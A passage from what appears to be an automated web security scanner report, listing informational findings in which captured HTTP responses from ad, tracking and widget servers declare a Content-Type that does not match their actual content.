Set-Cookie: B3=8dnC0000000002u28KY10000000000t.8Tjz0000000000tX97pN0000000001t.8P920000000001tV8Qvs0000000003tY8HLo0000000005tY95u+0000000001tU8Swk0000000005tX93Np0000000001tW8Jbw0000000004tV8T+c0000000001u48B100000000001tY8nf80000000000tX8V.x0000000001tZ8ZIR0000000002tV8nf90000000000tX9ajg0000000001u08QDY0000000001u18Jbt0000000003tY92de0000000002tW8SBq0000000001tZ93Nl0000000001tX8B0.0000000001tX8TZe000000000au09br40000000001u18B120000000005tX8Qvv0000000001tX5J3v0000000000tZ9br30000000001u18WhH0000000001tV8Ykb0000000001tZ84hv0000000002t.9br20000000002u186Y60000000001tW9c2I000000000hu08Swi0000000000tX851k000000000mtY8Swj0000000000tX95uB0000000001tX; expires=Fri, 08-Jul-2011 08:59:31 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 09 Apr 2011 12:59:30 GMT
Connection: close
Content-Length: 1841

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
17.17. http://cdn.taboolasyndication.com/libtrc/hearst-wptz/rbox.en.4-6-12-44788.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.taboolasyndication.com
Path:   /libtrc/hearst-wptz/rbox.en.4-6-12-44788.json

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /libtrc/hearst-wptz/rbox.en.4-6-12-44788.json HTTP/1.1
Host: cdn.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:30:46 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 06 Apr 2011 16:58:49 GMT
ETag: "7e8883-284-4a042e817c440"
Accept-Ranges: bytes
Content-Length: 644
Content-Type: text/plain; charset=UTF-8
Content-Language: en, en
Cache-Control: private, max-age=31536000
Age: 232813
Expires: Thu, 05 Apr 2012 19:50:33 GMT
Connection: Keep-Alive

trc_json_locale_data={"rbox":{"":{"MIME-Version":" 1.0","POT-Creation-Date":" 2009-06-03 19:30+0300","X-Poedit-SourceCharset":" utf-8","X-Poedit-Country":" ISRAEL","X-Poedit-Language":" Hebrew","Last-
...[SNIP]...
17.18. http://cdnserve.a-widget.com/service/getWidget2.kickAction  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdnserve.a-widget.com
Path:   /service/getWidget2.kickAction

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /service/getWidget2.kickAction?as=62976&widgetId=284623 HTTP/1.1
Host: cdnserve.a-widget.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/kickapps/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain;charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=0
Expires: Sat, 09 Apr 2011 12:29:51 GMT
Date: Sat, 09 Apr 2011 12:29:51 GMT
Connection: close
Content-Length: 13567

{"adBuyOut":true,"cs_rwid":"","cs_wid":"","feedAkHost":"serve.a-feed.com","height":"346","pathToPreview":"62976/photos/WIDGET_284623_ap.jpg","pathToPreview160X160":"62976/photos/WIDGET_284623_ap_160X1
...[SNIP]...
17.19. http://clientapps.kickapps.com/hearst/articleTitles.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://clientapps.kickapps.com
Path:   /hearst/articleTitles.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /hearst/articleTitles.php?as=62976&lSize=4&divName=kickapps_mostcommented&daysOffset=3 HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:29:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:29:55 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 861

//fl1-13

//http://serve.a-feed.com/service/getFeed.kickAction?as=62976&mediaType=externalmedia&sortType=commented&quantity=4&fromDate=04-06-2011
var title_container = document.getElementById('kickapp
...[SNIP]...
17.20. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/cnr_100plus.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=EST&pSize=&dName=&loginAtBottom= HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:31:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:31:08 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 87675

var ka_version_number = "1.71";
var ka_external_url = "http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html";
var ka_adminUser = 'wptz';
var ka_commentsList = "";
var ka_as = "62976";
var ka_totS
...[SNIP]...
17.21. http://clientapps.kickapps.com/hearst/comments/include.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/include.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /hearst/comments/include.php?as=62976 HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:30:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:30:40 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 1189

function ka_include_css(filename){
   var headID = document.getElementsByTagName("head")[0];
   var cssNode = document.createElement('link');
   cssNode.type = 'text/css';
   cssNode.rel = 'styleshee
...[SNIP]...
17.22. http://clientapps.kickapps.com/hearst/comments/start.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/start.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /hearst/comments/start.php?as=62976&id=http://www.wptz.com/news/27483035/detail.html&n=Guard%20Prepares%20For%20Possible%20Federal%20Shutdown&d=The%20head%20of%20the%20Vermont%20National%20Guard%20says%20a%20federal%20shutdown%20would%20put%20around%20400%20members%20on%20furlough%20and%20hundreds%20more%20working%20but%20unsure%20when%20they%20would%20be%20paid.&tzAbbr=EST HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:31:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:31:06 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 913

function verifyDomain() {
   var currentLocation = new String(window.location.href);
   var ka_communitySite = new String('http://ulocal.wptz.com/');
   //alert('current location:'+currentLocation+' ka_comm
...[SNIP]...
17.23. http://hostedusa3.whoson.com/include.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hostedusa3.whoson.com
Path:   /include.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /include.js?domain=stalker.opticalcorp-vsdoc.js HTTP/1.1
Host: hostedusa3.whoson.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 315

document.write("<div style='text-align:center;padding:5px'>WhosOn Live Stats &amp; Live Chat services are not active for this site. Please remove the tracking code or re-activate your service. Please
...[SNIP]...
17.24. http://javadl-esd.sun.com/update/AU/map-2.0.3.1.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://javadl-esd.sun.com
Path:   /update/AU/map-2.0.3.1.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /update/AU/map-2.0.3.1.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: javadl-esd.sun.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 15
Date: Sun, 10 Apr 2011 15:11:15 GMT
Connection: close
Cache-Control: private

File not found.
17.25. http://kellwood.com/homeImageFiles.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://kellwood.com
Path:   /homeImageFiles.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /homeImageFiles.asp HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/homeImageRoll.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 11 Apr 2011 17:19:51 GMT
Content-Length: 144

picFile1=home7.jpg&picFile2=home1.jpg&picFile3=home2.jpg&picFile4=home3.jpg&picFile4=home5.jpg&picFile5=home6.jpg&picFile6=home7.jpg&totalPics=7
17.26. http://nexus.ensighten.com/IB/serverComponent.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://nexus.ensighten.com
Path:   /IB/serverComponent.php

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /IB/serverComponent.php?ClientID=5&PageID=http%3A%2F%2Fwww.wptz.com%2Findex.html&grl=3;855;1093;1095;1109;1206;1207; HTTP/1.1
Host: nexus.ensighten.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 09 Apr 2011 12:29:46 GMT
Server: Apache
Content-Length: 44
Connection: keep-alive

Bootstrapper.callOnPageSpecificCompletion();
17.27. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=819&ref2=elqNone&tzo=360&ms=647 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.clickability.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=9F2C033650FB4C7793C57A298A857620; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Sat, 09 Apr 2011 00:17:52 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;
17.28. http://s3.amazonaws.com/getsatisfaction.com/images/transparent.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://s3.amazonaws.com
Path:   /getsatisfaction.com/images/transparent.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /getsatisfaction.com/images/transparent.gif HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://appointron.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: jJ2WacLrhhcUV8M5uhvnF3VD/2E0Xcfd8WCcieZL7lIRETjvUL2zj1mJQtIIbYn2
x-amz-request-id: BD6BC4F98471650B
Date: Fri, 08 Apr 2011 18:48:33 GMT
Cache-Control: Sat Mar 17 18:59:04 -0700 2012
Expires: Sat Mar 17 18:59:04 -0700 2012
Last-Modified: Fri, 18 Mar 2011 01:59:08 GMT
ETag: "4408efc0174f07ad685c456f1de521ca"
Accept-Ranges: bytes
Content-Type: image/png
Content-Length: 49
Server: AmazonS3

GIF89a...................!.......,...........D..;
17.29. http://server.iad.liveperson.net/hcp/html/mTag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://server.iad.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=47227738 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.clickability.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=48701824114,d=1301944418

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://server.iad.liveperson.net/lpWeb/default_SMB//hcpv/emt/mtag.js?site=47227738
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:cb7"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
Date: Sat, 09 Apr 2011 00:18:16 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...
17.30. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://spd.pointroll.com
Path:   /PointRoll/Ads/PRScript.dll

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /PointRoll/Ads/PRScript.dll?v=128&pos=0&init=1&delay=0&push=0&set=2&bye=1 HTTP/1.1
Host: spd.pointroll.com
Proxy-Connection: keep-alive
Referer: http://ads.pointroll.com/PortalServe/?pid=1190962H87920110119151326&cid=1424449&pos=h&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&time=6|7:35|-5&r=0.8330807760357857&flash=10&server=polRedir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRbu=EoHuVITO3; PRgo=BBBAAsJvBBF-19!B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-Type: text/plain
Content-Length: 13001
Date: Sat, 09 Apr 2011 12:36:12 GMT
Connection: close

/*PointRoll.2011 v128*/var priw,prih,prz=0,przo=0,prsw=0,prrv=0,prpi=0,prtg=0,prta=1,prpc='',prpf,prcw,prad=0,prca=0,prff=0,prmh=0,prup=0,proto,proto2,prbf=0,proo=0,prgo=0,pria=0,prpdts,prpot=0,prFlag
...[SNIP]...
17.31. http://tracking.placelocal.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://tracking.placelocal.com
Path:   /

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /?request=doTracking&campaign_id=8297&api_key=70e033792a53cae1ee45d73313c4cd85&invocation_code=7cbbc409ec990f19c78c75bd1e06f215&tracking_type=impression&referer=http://www.wptz.com/news/27483035/detail.html&format=serialized&cacheBusting=1264133793212 HTTP/1.1
Host: tracking.placelocal.com
Proxy-Connection: keep-alive
Referer: http://wptz.placelocal.com/flash/Ad_Frame_300.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 09 Apr 2011 12:31:22 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Vary: Accept-Encoding
Content-Length: 69

a:3:{i:0;b:1;i:1;s:33:"Successfully saved tracking data.";i:2;a:0:{}}
17.32. http://trc.taboolasyndication.com/hearst-wptz/trc/2/json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://trc.taboolasyndication.com
Path:   /hearst-wptz/trc/2/json

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /hearst-wptz/trc/2/json?list-id=rbox-t2v&id=951&list-size=8&uim=rbox-t2v&intent=s&uip=rbox-t2v&item-id=27483035&item-type=text&item-url=http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html&page-id=2ac6fb1502cd6a6ab15dbfe3963b5435b0e9803e&cv=4-6-12-44788-2000376&uiv=default&external=http%3A//www.wptz.com/news/index.html HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:30:47 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain; charset=utf-8
Set-Cookie: taboola_user_id=e3cbf8bd-271f-4170-9db8-4d166c313912;Path=/;Expires=Sun, 08-Apr-12 12:30:47 GMT
Set-Cookie: taboola_session_id=v1_3864f57c731de4fe0b1d609835b4301a_e3cbf8bd-271f-4170-9db8-4d166c313912_1302352247_1302352247;Path=/hearst-wptz/
Set-Cookie: JSESSIONID=.prod2-f5;Path=/
Set-Cookie: taboola_wv=;Path=/hearst-wptz/;Expires=Sun, 08-Apr-12 12:30:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 5225

trc_json_response =
{"trc":{"req":"bc5bef2d8104b48dc71f8af6ca218222","session-id":"3864f57c731de4fe0b1d609835b4301a","session-data":"v1_3864f57c731de4fe0b1d609835b4301a_e3cbf8bd-271f-4170-9db8-4d166c3
...[SNIP]...
17.33. http://www.acquisio.com/wp-content/themes/acquisio/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.acquisio.com
Path:   /wp-content/themes/acquisio/images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /wp-content/themes/acquisio/images/favicon.ico HTTP/1.1
Host: www.acquisio.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:18:52 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 23 May 2010 01:01:33 GMT
ETag: "1e0142-e36-771ab540"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h...&... ..............(....... ...........@.............................................................................................................................................
...[SNIP]...
17.34. http://www.clickability.com/templates/Corp_Scripts_Template.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.clickability.com
Path:   /templates/Corp_Scripts_Template.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /templates/Corp_Scripts_Template.js HTTP/1.1
Host: www.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.clickability.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vmVisitorState=0; vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; click_mobile=0

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Server-Name: dv-c1-r2-u24-b1
Content-Type: text/html;charset=utf-8
Expires: Sat, 09 Apr 2011 00:18:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:18:05 GMT
Connection: close
Set-Cookie: vmVisitorState=0; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:12 GMT; Path=/
Set-Cookie: vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:12 GMT; Path=/
Set-Cookie: click_mobile=0
Content-Length: 6708

function commentReturnFunction(){
   var obj = document.getElementById('commentPost');
   var message;
   
   if(Comment.error)
       var status = Comment.error;
   else
       var status = Comment.status;    

   i
...[SNIP]...
17.35. http://www.clickability.com/templates/swfobject.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.clickability.com
Path:   /templates/swfobject.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /templates/swfobject.js HTTP/1.1
Host: www.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.clickability.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vmVisitorState=0; vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; click_mobile=0

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Server-Name: dv-c1-r2-u14-b6
Content-Type: text/html;charset=utf-8
Expires: Sat, 09 Apr 2011 00:18:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:18:06 GMT
Connection: close
Set-Cookie: vmVisitorState=0; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:13 GMT; Path=/
Set-Cookie: vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:13 GMT; Path=/
Set-Cookie: click_mobile=0
Content-Length: 10225

/*    SWFObject v2.2 <http://code.google.com/p/swfobject/>
   is released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/
var swfobject=function(){var D="undefined",r="ob
...[SNIP]...
17.36. http://www.foxnews.com/authentication/logout/submit  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.foxnews.com
Path:   /authentication/logout/submit

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /authentication/logout/submit HTTP/1.1
Host: www.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
